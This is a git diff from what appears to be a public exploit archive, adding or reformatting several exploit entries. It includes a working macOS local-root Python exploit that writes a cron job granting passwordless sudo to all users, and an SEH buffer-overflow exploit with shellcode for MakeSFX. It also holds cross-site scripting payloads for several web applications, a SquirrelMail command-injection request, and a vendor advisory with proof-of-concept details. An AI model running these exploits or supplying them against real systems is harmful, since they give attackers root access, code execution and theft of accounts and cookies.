a/platforms/osx/local/38371.py b/platforms/osx/local/38371.py new file mode 100755 index 000000000..93fd9a1e5 --- /dev/null +++ b/platforms/osx/local/38371.py @@ -0,0 +1,38 @@ +# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root +# tested on osx 10.9.5 / 10.10.5 +# jul/2015 +# by rebel + +import os,time,sys + +env = {} + +s = os.stat("/etc/sudoers").st_size + +env['MallocLogFile'] = '/etc/crontab' +env['MallocStackLogging'] = 'yes' +env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n' + +sys.stderr.write("creating /etc/crontab..") + +p = os.fork() +if p == 0: + os.close(1) + os.close(2) + os.execve("/usr/bin/rsh",["rsh","localhost"],env) + +time.sleep(1) + +if "NOPASSWD" not in open("/etc/crontab").read(): + sys.stderr.write("failed\n") + sys.exit(-1) + +sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..") + +while os.stat("/etc/sudoers").st_size == s: + sys.stderr.write(".") + time.sleep(1) + +sys.stderr.write("\ndone\n") + +os.system("sudo su") diff --git a/platforms/php/webapps/38372.html b/platforms/php/webapps/38372.html new file mode 100755 index 000000000..9dfcc654e --- /dev/null +++ b/platforms/php/webapps/38372.html @@ -0,0 +1,48 @@ +source: http://www.securityfocus.com/bid/58414/info + +Question2Answer is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. + +Question2Answer 1.5.4 is vulnerable; other versions may also be affected. + + + +Exploit for stealing admin's account in Question2Answer. Made by +MustLive. http://www.example.com + + + + + + diff --git a/platforms/php/webapps/38373.txt b/platforms/php/webapps/38373.txt new file mode 100755 index 000000000..d2a3dbbb1 --- /dev/null +++ b/platforms/php/webapps/38373.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/58415/info + +The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +">'> \ No newline at end of file diff --git a/platforms/php/webapps/38374.txt b/platforms/php/webapps/38374.txt new file mode 100755 index 000000000..64b8d6339 --- /dev/null +++ b/platforms/php/webapps/38374.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/58417/info + +SWFUpload is prone to multiple cross-site scripting and content spoofing vulnerabilities because it fails to sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +Content spoofing: + +http://www.example.com/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E + +Cross-site scripting: + +http://www.example.com/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E \ No newline at end of file diff --git a/platforms/php/webapps/38375.txt b/platforms/php/webapps/38375.txt new file mode 100755 index 000000000..6c8b9253d --- /dev/null +++ b/platforms/php/webapps/38375.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/58418/info + +Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/public/error.php?warning= \ No newline at end of file diff --git a/platforms/php/webapps/38376.txt b/platforms/php/webapps/38376.txt new file mode 100755 index 000000000..91607c0be --- /dev/null +++ b/platforms/php/webapps/38376.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/58421/info + +The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +podPress 8.8.10.13 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}// \ No newline at end of file diff --git a/platforms/php/webapps/38377.txt b/platforms/php/webapps/38377.txt new file mode 100755 index 000000000..c7955189e --- /dev/null +++ b/platforms/php/webapps/38377.txt @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/58425/info + +Privoxy is prone to multiple information-disclosure vulnerabilities. + +Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks. + +Privoxy 3.0.20 is affected; other versions may also be vulnerable. + +Response Code (current).: 407 + +Response Headers (as seen by your browser).: + +HTTP/1.1 407 Proxy Authentication Required +Date: Mon, 11 Mar 2013 17:01:59 GMT +Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80 +Proxy-Authenticate: Basic +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 571 +Keep-Alive: timeout=15, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Request Headers (as seen by the remote website) + +Host: c22.cc +User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://www.example.com/ +Connection: keep-alive diff --git a/platforms/php/webapps/4173.txt b/platforms/php/webapps/4173.txt index 7d12808a8..05e903a7c 100755 --- a/platforms/php/webapps/4173.txt +++ b/platforms/php/webapps/4173.txt @@ -1,50 +1,50 @@ -SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability - -Bugtraq ID: 24782 - ------------------------------ - -There are various vulnerabilities in this software! One is in -keyring_main.php! -$fpr is not escaped from shellcommands! - -testbox:/home/w00t# cat /tmp/w00t -cat: /tmp/w00t: No such file or directory -testbox:/home/w00t# - -***@silverlaptop:~$ nc *** 80 -POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1 -Host: *** -User-Agent: w00t -Keep-Alive: 300 -Connection: keep-alive -Cookie: Authentication Data for SquirrelMail -Content-Type: application/x-www-form-urlencoded -Content-Length: 140 - -id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | -&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1 - -... - -testbox:/home/w00t# cat /tmp/w00t -testbox:/home/w00t# - -So we just executed 'touch /tmp/w00t'! - -WabiSabiLabi tries to sell the exploit for 700 Euro! ;) -lol @ WabiSabiLabi! - -Greets: - -oli and all members of jmp-esp! - - -jmp-esp is looking for people who are interested in IT security! -Currently we are looking for people who like to write articles for a -German ezine or are interested in exchanging informations, exploits... - -IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl) - #main - -# milw0rm.com [2007-07-11] +SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability + +Bugtraq ID: 24782 + +----------------------------- + +There are various vulnerabilities in this software! One is in +keyring_main.php! +$fpr is not escaped from shellcommands! + +testbox:/home/w00t# cat /tmp/w00t +cat: /tmp/w00t: No such file or directory +testbox:/home/w00t# + +***@silverlaptop:~$ nc *** 80 +POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1 +Host: *** +User-Agent: w00t +Keep-Alive: 300 +Connection: keep-alive +Cookie: Authentication Data for SquirrelMail +Content-Type: application/x-www-form-urlencoded +Content-Length: 140 + +id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | +&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1 + +... + +testbox:/home/w00t# cat /tmp/w00t +testbox:/home/w00t# + +So we just executed 'touch /tmp/w00t'! + +WabiSabiLabi tries to sell the exploit for 700 Euro! ;) +lol @ WabiSabiLabi! + +Greets: + +oli and all members of jmp-esp! + + +jmp-esp is looking for people who are interested in IT security! +Currently we are looking for people who like to write articles for a +German ezine or are interested in exchanging informations, exploits... + +IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl) + #main + +# milw0rm.com [2007-07-11] diff --git a/platforms/php/webapps/5417.htm b/platforms/php/webapps/5417.htm index 6c77b805e..7296520ec 100755 --- a/platforms/php/webapps/5417.htm +++ b/platforms/php/webapps/5417.htm @@ -1,58 +1,58 @@ - - - -Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit - - - - - -
- -

Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit

- -

-
- Target:[http://[target]/[directory] -   -

-

-
-


- -

- -bd0rk

-
- - - - -# milw0rm.com [2008-04-09] + + + +Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit + + + + + +
+ +

Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit

+ +

+
+ Target:[http://[target]/[directory] +   +

+

+
+


+ +

+ +bd0rk

+
+ + + + +# milw0rm.com [2008-04-09] diff --git a/platforms/php/webapps/8965.txt b/platforms/php/webapps/8965.txt index b9aa017d7..50bb203e7 100755 --- a/platforms/php/webapps/8965.txt +++ b/platforms/php/webapps/8965.txt @@ -1,38 +1,38 @@ -vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability - -About:- - -Radio and TV Add-on will add a radio and TV library to your forum. - -Features:- - -- Users can add / delete / edit own stations - -For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2 - -Note:- - -- To exploit this Bug need to be registred!and after you are registered you can add new radio station - where name station can be "> - and URL "> - - -Poc: XSS - -http://www.musicadigitale.net/forum/radioandtv.php?station=92 - -Poc: Iframe - -http://www.musicadigitale.net/forum/radioandtv.php?station=93 - -Poc: Redirect - -http://www.musicadigitale.net/forum/radioandtv.php?station=94 - -dorks:- inurl:radioandtv.php - -Bug founded by d3v1l [Avram Marius] - -Date: 14.06.2009 - -# milw0rm.com [2009-06-15] +vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability + +About:- + +Radio and TV Add-on will add a radio and TV library to your forum. + +Features:- + +- Users can add / delete / edit own stations + +For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2 + +Note:- + +- To exploit this Bug need to be registred!and after you are registered you can add new radio station + where name station can be "> + and URL "> + + +Poc: XSS + +http://www.musicadigitale.net/forum/radioandtv.php?station=92 + +Poc: Iframe + +http://www.musicadigitale.net/forum/radioandtv.php?station=93 + +Poc: Redirect + +http://www.musicadigitale.net/forum/radioandtv.php?station=94 + +dorks:- inurl:radioandtv.php + +Bug founded by d3v1l [Avram Marius] + +Date: 14.06.2009 + +# milw0rm.com [2009-06-15] diff --git a/platforms/windows/dos/3430.html b/platforms/windows/dos/3430.html index ed705a5da..b61f430e7 100755 --- a/platforms/windows/dos/3430.html +++ b/platforms/windows/dos/3430.html @@ -1,72 +1,72 @@ - - - - -# milw0rm.com [2007-03-08] + + + + +# milw0rm.com [2007-03-08] diff --git a/platforms/windows/local/38362.py b/platforms/windows/local/38362.py index 68ea7b423..46890dd18 100755 --- a/platforms/windows/local/38362.py +++ b/platforms/windows/local/38362.py @@ -16,7 +16,7 @@ freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe Vulnerable Product: ================================================== -MakeSFX.exe v1.44 +MakeSFX.exe v1.44 Mar 19 2001 & Dec 10 2009 versions @@ -47,20 +47,14 @@ makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"] etc... -The '/title' argument when supplied an overly long payload will overwrite -NSEH & SEH exception handlers -causing buffer overflow, we can then execute our aribitrary shellcode. I -have seen some applications using -MakeSFX.exe from .bat files for some automation purposes, if the local .bat -file is replaced by malicious +The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers +causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using +MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious one attackers can cause mayhem on the system. -Both versions from 2001 & 2009 are vulnerable but exploit setup will be off -by 20 bytes. -punksnotdead="A"*1078+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX -v1.44 (Dec 10 2009) -punksnotdead="A"*1158+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX -v1.44 (Mar 19 2001) +Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes. +punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009) +punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001) POC exploit code(s): @@ -68,10 +62,8 @@ POC exploit code(s): We will exploit MakeSFX v1.44 (Mar 19 2001). -I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, -Rebase all set to False, but it contains null 0x00. -So no suitable SEH instruction address avail, I will instead have to use -mona.py to look for POP,POP,RET instruction +I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00. +So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction in outside modules and we find some... e.g. @@ -102,7 +94,7 @@ sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" nseh="\xEB\x06"+"\x90"*2 seh=struct.pack(' - - - - - - - - - - - - - - - - - -- -----------/ - -Note: The security vulnerability is also exploitable on the standalone -player, however, this functionality appears to be the expected behavior -and fully intended for the standalone player. - - -9. *Report Timeline* - -. 2009-05-21: -Core Security Technologies notifies the Worldweaver Support Team (WST) -of the vulnerability and announces its initial plan to publish the -content on June 15th, 2009. - -. 2009-05-26: -The WST asks Core for a technical description of the vulnerability. - -. 2009-05-26: -Technical details sent to WST by Core. - -. 2009-06-08: -Core asks WST for an estimated date to fix this issue. - -. 2009-06-08: -WST notifies Core that a fix has already been produced and it is -available to the users. - -. 2009-06-09: -The advisory CORE-2009-0521 is published. - - -10. *References* - -[1] http://www.dxstudio.com. -[2] http://www.dxstudio.com/download2.aspx. -[3] -http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd - - -11. *About CoreLabs* - -CoreLabs, the research center of Core Security Technologies, is charged -with anticipating the future needs and requirements for information -security technologies. We conduct our research in several important -areas of computer security including system vulnerabilities, cyber -attack planning and simulation, source code auditing, and cryptography. -Our results include problem formalization, identification of -vulnerabilities, novel solutions and prototypes for new technologies. -CoreLabs regularly publishes security advisories, technical papers, -project information and shared software tools for public use at: -http://www.coresecurity.com/corelabs. - - -12. *About Core Security Technologies* - -Core Security Technologies develops strategic solutions that help -security-conscious organizations worldwide develop and maintain a -proactive process for securing their networks. The company's flagship -product, CORE IMPACT, is the most comprehensive product for performing -enterprise security assurance testing. CORE IMPACT evaluates network, -endpoint and end-user vulnerabilities and identifies what resources are -exposed. It enables organizations to determine if current security -investments are detecting and preventing attacks. Core Security -Technologies augments its leading technology solution with world-class -security consulting services, including penetration testing and software -security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core -Security Technologies can be reached at 617-399-6980 or on the Web at -http://www.coresecurity.com. - - -13. *Disclaimer* - -The contents of this advisory are copyright (c) 2009 Core Security -Technologies and (c) 2009 CoreLabs, and may be distributed freely -provided that no fee is charged for this distribution and proper credit -is given. - - -14. *PGP/GPG Keys* - -This advisory has been signed with the GPG key of Core Security -Technologies advisories team, which is available for download at -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.7 (MingW32) -Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org - -iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q -PMPteYbShbRU4j4tIk93HPM= -=Mx5G ------END PGP SIGNATURE----- - -# milw0rm.com [2009-06-10] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + + Core Security Technologies - CoreLabs Advisory + http://www.coresecurity.com/corelabs/ + + DX Studio Player Firefox plug-in command injection + + + +1. *Advisory Information* + +Title: DX Studio Player Firefox plug-in command injection +Advisory ID: CORE-2009-0521 +Advisory URL: +http://www.coresecurity.com/content/DXStudio-player-firefox-plugin +Date published: 2009-06-09 +Date of last update: 2009-06-09 +Vendors contacted: Worldweaver +Release mode: Coordinated release + + +2. *Vulnerability Information* + +Class: Command injection +Remotely Exploitable: Yes +Locally Exploitable: No +Bugtraq ID: N/A +CVE Name: CVE-2009-2011 + + +3. *Vulnerability Description* + +DX Studio [1] is a complete integrated development environment for +creating interactive 3D graphics. DX Studio Player plug-in for Firefox +[2] is vulnerable to a remote command execution vulnerability. + + +4. *Vulnerable packages* + + . DX Studio Player v3.0.29.0 + . DX Studio Player v3.0.22.0 + . DX Studio Player v3.0.12.0 + . Older versions are probably affected too, but they were not checked. + + +5. *Non-vulnerable packages* + + . DX Studio Player v3.0.29.1 + + +6. *Vendor Information, Solutions and Workarounds* + +On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1 +for all new downloads to fix the problem with the Firefox plugin, and +also posted a sticky announce for all its users [3]. + + +7. *Credits* + +This vulnerability was discovered and researched by Diego Juarez from +Core Security Technologies. + + +8. *Technical Description / Proof of Concept Code* + +DX Studio is a complete integrated development environment for creating +interactive 3D graphics. DX Studio provides a javascript API in which +the method 'shell.execute()' is defined as follows: + +/----------- + +Prototype: +shell.execute(commandString, [paramString], [commandIsProgId]); + +- -----------/ + +This method sends the 'commandString' to the Windows shell with optional +parameters in 'paramString'. For security reasons, this function is not +available when running in a web browser. If you set 'commandIsProgId' to +true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with +parameter 'play' would play a DVD in Windows Media Player. + +In our tests, despite what is stated in the documentation, we found that +the function is actually available to both the Internet Explorer and +Firefox browser plug-ins. In the IE plug-in the user does get a warning +about the security implications of allowing such '.dxstudio' file to +run. On Firefox however, there is no such warning whatsoever, allowing +an attacker to execute arbitrary code on the client side by luring the +victim into clicking a link or visiting a malicious website. + + +8.1. *Proof of Concept (header.xml)* + +/----------- + + + + + + + + + + + + + + + + + + + +- -----------/ + +Note: The security vulnerability is also exploitable on the standalone +player, however, this functionality appears to be the expected behavior +and fully intended for the standalone player. + + +9. *Report Timeline* + +. 2009-05-21: +Core Security Technologies notifies the Worldweaver Support Team (WST) +of the vulnerability and announces its initial plan to publish the +content on June 15th, 2009. + +. 2009-05-26: +The WST asks Core for a technical description of the vulnerability. + +. 2009-05-26: +Technical details sent to WST by Core. + +. 2009-06-08: +Core asks WST for an estimated date to fix this issue. + +. 2009-06-08: +WST notifies Core that a fix has already been produced and it is +available to the users. + +. 2009-06-09: +The advisory CORE-2009-0521 is published. + + +10. *References* + +[1] http://www.dxstudio.com. +[2] http://www.dxstudio.com/download2.aspx. +[3] +http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd + + +11. *About CoreLabs* + +CoreLabs, the research center of Core Security Technologies, is charged +with anticipating the future needs and requirements for information +security technologies. We conduct our research in several important +areas of computer security including system vulnerabilities, cyber +attack planning and simulation, source code auditing, and cryptography. +Our results include problem formalization, identification of +vulnerabilities, novel solutions and prototypes for new technologies. +CoreLabs regularly publishes security advisories, technical papers, +project information and shared software tools for public use at: +http://www.coresecurity.com/corelabs. + + +12. *About Core Security Technologies* + +Core Security Technologies develops strategic solutions that help +security-conscious organizations worldwide develop and maintain a +proactive process for securing their networks. The company's flagship +product, CORE IMPACT, is the most comprehensive product for performing +enterprise security assurance testing. CORE IMPACT evaluates network, +endpoint and end-user vulnerabilities and identifies what resources are +exposed. It enables organizations to determine if current security +investments are detecting and preventing attacks. Core Security +Technologies augments its leading technology solution with world-class +security consulting services, including penetration testing and software +security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core +Security Technologies can be reached at 617-399-6980 or on the Web at +http://www.coresecurity.com. + + +13. *Disclaimer* + +The contents of this advisory are copyright (c) 2009 Core Security +Technologies and (c) 2009 CoreLabs, and may be distributed freely +provided that no fee is charged for this distribution and proper credit +is given. + + +14. *PGP/GPG Keys* + +This advisory has been signed with the GPG key of Core Security +Technologies advisories team, which is available for download at +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.7 (MingW32) +Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org + +iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q +PMPteYbShbRU4j4tIk93HPM= +=Mx5G +-----END PGP SIGNATURE----- + +# milw0rm.com [2009-06-10]